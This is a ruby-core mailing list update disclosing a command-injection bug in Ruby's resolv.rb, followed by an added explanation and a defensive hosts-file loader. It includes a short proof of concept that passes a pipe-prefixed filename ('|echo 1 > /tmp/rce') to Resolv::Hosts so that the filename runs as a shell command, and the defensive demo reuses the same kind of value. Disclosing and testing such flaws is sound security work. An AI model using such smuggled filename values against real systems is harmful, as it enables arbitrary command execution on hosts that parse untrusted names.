[ruby-core:84348] [Ruby trunk Bug#14205] Unsanitizied filename leads to command injection in 'resolv.rb'
From: jazzy171120@...
Date: 2017-12-19 10:08:43 UTC
List: ruby-core #84348
Issue #14205 has been updated by drigg3r (Jasraj Bedi).
Subject changed from Unsanitizied filename leads to command injection in 'resolv' to Unsanitizied filename leads to command injection in 'resolv.rb'
PoC Concept Code
~~~ ruby
require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
~~~
----------------------------------------
Bug #14205: Unsanitizied filename leads to command injection in 'resolv.rb'
https://bugs.ruby-lang.org/issues/14205#change-68524
* Author: drigg3r (Jasraj Bedi)
* Status: Open
* Priority: Normal
* Assignee:
* Target version:
* ruby -v:
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN
----------------------------------------
Here is the pull request
https://github.com/ruby/ruby/pull/1777
--
https://bugs.ruby-lang.org/
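A filename beginning with `|` is run as a command when it reaches `Kernel#open`, which is the behaviour the PoC above relies on. As an added example (not code from resolv.rb, the reporter, or the linked pull request), here is a hosts-file loader that opens its argument with `File.open`, so the same string is only ever treated as a path; `load_hosts` and `demo` are hypothetical names and the sample data is constructed.

```ruby
require 'tmpdir'

# Hypothetical helper, not the resolv.rb API: parse a hosts-format file
# into { hostname => [addresses] }.
def load_hosts(filename)
  table = Hash.new { |h, k| h[k] = [] }
  # File.open always treats its argument as a path. Kernel#open(filename)
  # would instead spawn a subprocess for a name that starts with "|".
  File.open(filename, 'r') do |f|
    f.each_line do |line|
      addr, *names = line.sub(/#.*/, '').split  # drop comments, split fields
      next if addr.nil?                         # blank or comment-only line
      names.each { |n| table[n] << addr }
    end
  end
  table
end

# Runs the loader on a constructed hosts file and on a constructed name with
# the same shape as the PoC string.
# Returns [parsed_table, error_class_for_pipe_name, marker_file_created?].
def demo
  Dir.mktmpdir do |dir|
    hosts = File.join(dir, 'hosts')
    File.write(hosts, "127.0.0.1 localhost # constructed sample\n" \
                      "10.0.0.5 build build.internal\n")
    marker  = File.join(dir, 'marker')
    hostile = "|echo 1 > #{marker}"
    err = begin
      load_hosts(hostile)
      nil
    rescue SystemCallError => e
      e.class                                   # the name is just a missing path
    end
    [load_hosts(hosts), err, File.exist?(marker)]
  end
end

if $PROGRAM_NAME == __FILE__
  table, err, created = demo
  puts "parsed: #{table.inspect}"
  puts "pipe-style name raised #{err}, marker created: #{created}"
end
```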